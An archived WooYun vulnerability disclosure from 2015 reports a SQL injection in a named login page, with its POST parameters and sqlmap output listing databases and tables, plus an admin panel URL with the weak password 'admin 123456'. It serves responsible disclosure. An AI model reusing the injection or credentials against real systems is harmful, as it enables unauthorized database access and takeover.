乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-20: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
20151120
1.sql注入http://121.14.6.93:8001/login.aspPOST:Submit=%b5%c7%c2%bd&pass=1111&usr=1usr参数
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008
available databases [8]:[*] CE_Portal[*] domainlogin1_22[*] master[*] MIS_Release[*] MIS_Release1[*] model[*] msdb[*] tempdb
Database: domainlogin1_22[154 tables]+----------------------------------+| OtherApply3.0 || OtherApply3.0ServiceMapping || QualityApply3.0 || WebService3.0 || 1CN_CompanyInfo || 1CSLV_ContractLastTime || 1CompanyInfo || 1Domain_Continue || 1Domain_Register || 1Domain_ShiftInfo || 1Domain_State || 1MYCE_EmployeeInfo || 1ddtable || Adatabase || AreaInfo || BuinessType || CN_CompanyInfo || CN_CompanyInfo_old || CSLV_ContractLastTime || Cdatabase || CompanyComparison || CompanyInfo || CompanyInfo_old || DBProduct || DictionaryIncrementFun || DictionaryStatus || DomainLogin_ZMailData || Domain_Continue || Domain_Continue_old || Domain_Register || Domain_Register_Old || Domain_ShiftInfo || Domain_ShiftInfo_old || Domain_State || FTPUserInfo || IPTable || IVR || IVRPhoneRouter || IVR_AutoVoice || Industry || InterfaceLog || LDAPOperationLog || LHMtable || Lanuage || MYCE_EmployeeInfo || MailBoxFuns || ModifLog || ModifUsr || PhoneRouter || ProductType || ProductTypeMIS2ProductMapping || SQLPath || SendMailLog || Setting || SysLog || TaskLog || Tietong || Tietong4007Log || Tietong4007NoRank || Tietong4007NoRankAmount || TietongIncrementFun || TietongYunYingLog || TitongOperationLog || TotalAreaDayList || TotalAreaMonthList || TotalDayList || TotalMonthList || TradeEdition || UserLog || Users || Users_acc || WebServiceCodeMapping || ZJAreaSubCompany || ZQT || ZQT_BusinessType || ZQT_MessageService || ZQT_OnlineService || ZQT_OperationLog || ZQT_ProductType || ZQT_Relation || ZQT_Status || ZQT_Tietong_Relation || ZQT_YunYingLog || 'CSLV_ContractLastTime?7-1--8-1?$' || Renew&AddNewRelation || Tietong&I2SSRelation || acomemail || address || agroupemail || agroupemailfuns || aoutdomain || area || byname || cbyname || cchangedomain || ccomemail || cftpuserinfo || cftpuserinfo_old || cgroupemail || changedomain || clientinfo || clientproduct || coutdomain || crm || ddtable || ddtable_old || domain || domain_rele || domaininfo || domainproduct || fgstable || fgstable_old || login_usr || login_usr1111 || mission || myuser || parse || parse1 || parse10 || parse11 || parse12 || parse12funs || parse13 || parse14 || parse15 || parse16 || parse17 || parse18 || parse19 || parse2 || parse20 || parse3 || parse4 || parse5 || parse6 || parse7 || parse8 || parse9 || pbcatcol || pbcatedt || pbcatfmt || pbcattbl || pbcatvld || setTotal || subCompany || t_modalinfo || t_productinfo || tem_inputTable || tempsheet || v_Parse7_TJ2 || v_Tietong || v_ZQT || v_emaillist || znsite44.Users_acc |+----------------------------------+
2.后台系统弱口令http://www.cetools.cn后台地址:http://www.cetools.cn/index.php/cetools_admin/indexadmin 123456
1.过滤2.修改密码
危害等级:高
漏洞Rank:20
确认时间:2015-11-20 22:10
正在处理。
暂无